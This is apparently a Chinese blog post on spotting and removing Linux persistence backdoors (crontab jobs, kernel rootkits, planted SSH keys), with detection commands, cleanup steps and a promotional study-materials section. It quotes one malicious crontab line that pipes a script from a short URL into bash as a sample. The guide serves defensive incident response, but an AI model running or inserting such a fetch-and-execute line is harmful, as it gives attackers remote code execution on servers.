☰
一文看懂 Linux 隐藏后门:计划任务、Rootkit、SSH 后门
2026/9/28 18:41:02 网站建设 项目流程

一文看懂 Linux 隐藏后门:计划任务、Rootkit、SSH 后门

前言

在 Linux 服务器入侵事件里,攻击者拿到权限后,首要目标不是立刻破坏业务,而是留下隐藏后门。就算管理员修改密码、杀掉恶意进程,只要后门存在,攻击者依旧可以再次拿下服务器。

很多普通木马容易被ps、top命令发现,但隐藏后门往往更隐蔽:有的藏在定时任务里开机自启,有的在内核层面隐藏进程,还有的直接利用 SSH 实现免密登录。很多运维甚至初级安全人员排查时很容易漏掉这一类后门。

本文重点拆解 Linux 最常见的三类隐藏后门:计划任务后门、Rootkit 内核后门、SSH 免密后门,包含原理、特征、排查命令和清除方法,适合应急响应、服务器安全巡检。

⚠️ 法律声明:本文仅用于企业授权环境下安全自查与网络安全学习,禁止在未授权的服务器上进行测试、植入后门,未经授权的入侵行为属于违法犯罪。

一、计划任务后门:最常用的持久化隐藏后门

计划任务(Crontab)是攻击者最喜欢的持久化方式,简单、稳定、不容易被重视。就算恶意程序被 kill,到了定时时间会自动重新下载执行木马。

1. 原理

Linux crontab 可以按照分钟、小时、天执行指定命令。攻击者写入恶意任务,定时拉取远端脚本、启动反弹 shell 或者挖矿程序。
分为用户级 crontab和系统级 crontab,很多人只查 root 的 crontab,忽略系统 cron 目录,导致后门遗漏。

2. 恶意计划任务典型特征

  1. 任务执行curl/wget下载外网脚本,直接管道交给 bash 执行;
  2. 脚本存放路径在/tmp、/dev/shm这类临时目录;
  3. 命令存在大量 base64 编码字符串,解码后执行恶意 shell;
  4. 任务周期很短,每几分钟执行一次;
  5. 任务文件名字乱码、隐藏文件(.开头),放在/etc/cron.d。

示例恶意 crontab:

*/3 * * * * root curl shturl.cc/Bufw7RLUoTUd | bash

3. 完整排查命令

# 查看当前用户crontab crontab -l # 查看root用户crontab crontab -u root -l # 系统级cron配置文件 cat /etc/crontab ls -l /etc/cron.d/ ls -l /etc/cron.hourly/ ls -l /etc/cron.daily/ ls -l /etc/cron.weekly/ ls -l /etc/cron.monthly/

4. 清理方法

  1. 直接编辑删除:crontab -e,删掉恶意任务行;
  2. 删除/etc/cron.d下陌生任务文件;
  3. 检查并删除任务中下载的恶意脚本文件;
  4. 检查其他普通用户的 crontab,攻击者不一定只用 root 账号。

坑点提醒:部分攻击者会在 crontab 里写空行、注释混淆视线,或者将命令拆分成多行、使用变量绕过简单筛查。

二、Rootkit 后门:内核级隐藏,普通命令看不见进程

Rootkit 属于高级隐藏后门,也是应急排查中最难处理的一类。普通木马是应用层程序,而 Rootkit 一般是内核模块,可以劫持系统调用,让ps、top、netstat看不到恶意进程、文件、端口。

1. 原理

Rootkit(内核木马)加载 ko 内核模块,劫持系统函数:

  • 劫持readdir:读取目录时,过滤掉恶意文件名;
  • 劫持getdents:过滤恶意进程 PID,ps、top 看不到进程;
  • 劫持网络相关调用:netstat 看不到恶意监听端口。

简单来说:系统命令被 “欺骗”,攻击者的程序明明在运行,但是常规命令看不到。

2. Rootkit 典型特征

  1. ps、top看不到可疑进程,但服务器 CPU / 内存异常占用;
  2. /proc目录中存在 ps 无法展示的 PID;
  3. lsmod查看内核模块,出现不知名、无描述的.ko模块;
  4. 执行uname -a信息被篡改,系统版本异常;
  5. 某些恶意文件无法删除,删除后自动恢复。

3. 排查思路

无法单纯依赖 ps、top,需要绕过被劫持的系统工具。

# 查看加载的内核模块 lsmod # 查看/proc下所有pid,对比ps输出,找出隐藏PID ls /proc | grep -E "[0-9]+" # 检查模块是否被隐藏,查看内核日志 dmesg | grep -i module

进阶方案:
使用静态编译的独立ps、ls二进制文件放到服务器上执行,避免系统自带命令被 Rootkit 劫持。

4. 清除方法

Rootkit 清理难度很高:

  1. 尝试卸载可疑内核模块:rmmod xxx.ko;很多 Rootkit 会防止卸载,直接 rmmod 失败;
  2. 找到 ko 文件删除;
  3. 若内核模块无法卸载,最佳方案是备份业务数据后重装系统。

重点:一旦确认存在内核 Rootkit,不建议单纯清理,攻击者已经拿到最高内核权限,很难保证完全清除后门。

三、SSH 后门:免密登录,无声的永久入口

SSH 后门是入侵中高频出现的持久化方式,不需要新增系统账号,不占用后台进程,非常隐蔽。攻击者只需要把自己的公钥写入目标服务器的 authorized_keys,之后不用密码就能登录服务器。

1. 原理

SSH 公钥认证机制:将攻击者的公钥写入服务器用户家目录下~/.ssh/authorized_keys,攻击者使用对应私钥即可免密登录。
不管是 root 账号还是普通用户,只要写入公钥,就能登录。很多人只检查 root,忽略普通业务账号。

2. SSH 后门常见变种

  1. 直接追加公钥到authorized_keys(最常见);
  2. 创建.ssh隐藏目录,修改目录权限,防止管理员查看;
  3. 修改 sshd 配置:开启 PermitRootLogin yes,放行 root 远程登录;
  4. 替换 sshd 二进制文件,制作 sshd 劫持后门(高级);
  5. 在多个用户下批量植入公钥,防止清理一个账号就失效。

3. 排查命令

# 遍历所有用户,检查.ssh目录 ls -l /home/*/.ssh/ ls -l /root/.ssh/ # 查看authorized_keys内容,检查陌生公钥 cat /root/.ssh/authorized_keys cat /home/*/.ssh/authorized_keys

检查 sshd 配置:

cat /etc/ssh/sshd_config

重点关注:PermitRootLogin、AuthorizedKeysFile等配置项。

4. 清理与加固

  1. 打开authorized_keys,删除陌生公钥,不要直接清空,避免把自己的公钥删掉;
  2. 检查.ssh目录权限,目录权限建议 700,authorized_keys 权限 600;
  3. 关闭不必要的 root 远程 SSH 登录;
  4. 禁止服务器普通用户随意上传公钥;
  5. 定期巡检所有用户的.ssh 目录。

踩坑:攻击者会在公钥前面加command="xxx",限制登录执行命令,这类公钥同样属于后门,很容易被忽略。

四、三类后门快速对比表

表格

后门类型隐藏程度排查难度核心风险
Crontab 计划任务中等低定时拉起木马,重启自动恢复
SSH 免密后门高低无进程,随时免密登录
Rootkit 内核后门极高高劫持系统命令,常规排查失效

五、一站式巡检命令(应急可直接复制执行)

# 1. 检查crontab crontab -u root -l ls /etc/cron.d # 2. 检查ssh公钥 ls /root/.ssh ls /home/*/.ssh # 3. 检查内核模块 lsmod # 4. 查看最近新增可疑文件 find /tmp /dev/shm /var/tmp -mtime -1 -type f # 5. 查看登录日志 last lastlog

六、发现隐藏后门的应急处理步骤

  1. 保留现场优先:不要立刻重启服务器,重启可能丢失进程、内存证据;
  2. 隔离主机:断开服务器外网,防止攻击者继续操作、横向渗透内网;
  3. 定位后门类型:区分是计划任务、SSH 公钥还是 Rootkit;
  4. 逐层清理:删除恶意文件、清除定时任务、删除陌生 SSH 公钥;
  5. 评估危害:检查攻击者是否下载窃取数据、横向访问内网其他机器;
  6. 修复入口:查找攻击者是弱密码、漏洞上传还是 webshell 进来;
  7. 复盘加固:修改所有账号密码,开启日志审计,定期巡检。

重要提醒:如果确认是 Rootkit 内核后门,清理风险很大,就算删除模块,也无法确认攻击者是否留有其他隐藏入口,优先评估重装系统。

结尾

Linux 隐藏后门各有特点:Crontab 简单粗暴、SSH 后门悄无声息,Rootkit 最难清除。很多入侵事件中攻击者会组合使用多种后门,比如植入 SSH 公钥的同时添加 crontab 任务,就算其中一个后门被清除,另一个还能继续使用。

日常服务器安全巡检不能只看进程和 CPU,需要多维度交叉验证:文件、计划任务、账号、SSH 密钥、内核模块。养成定期巡检的习惯,才能在攻击者潜伏阶段就发现隐患。

网络安全攻防一直在迭代,新的后门技术不断出现。本文覆盖的是生产环境最常见的三类隐藏后门,属于应急响应基础技能,适合运维转网安、渗透测试入门学习。

免责声明:本文仅用于网络安全学习、企业授权环境安全自查。任何未经授权访问、植入后门、入侵计算机系统,均触犯相关法律法规,作者不承担任何非法使用带来的法律责任。


了解网络安全,首先要搞清楚下面这些前提

  • 网络安全到底包含哪些技术?是否需要会编程?
  • 网络安全行业有哪些职业方向?“我”该如何选择?
  • 网络安全的职业发展和成长路线是什么?

如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询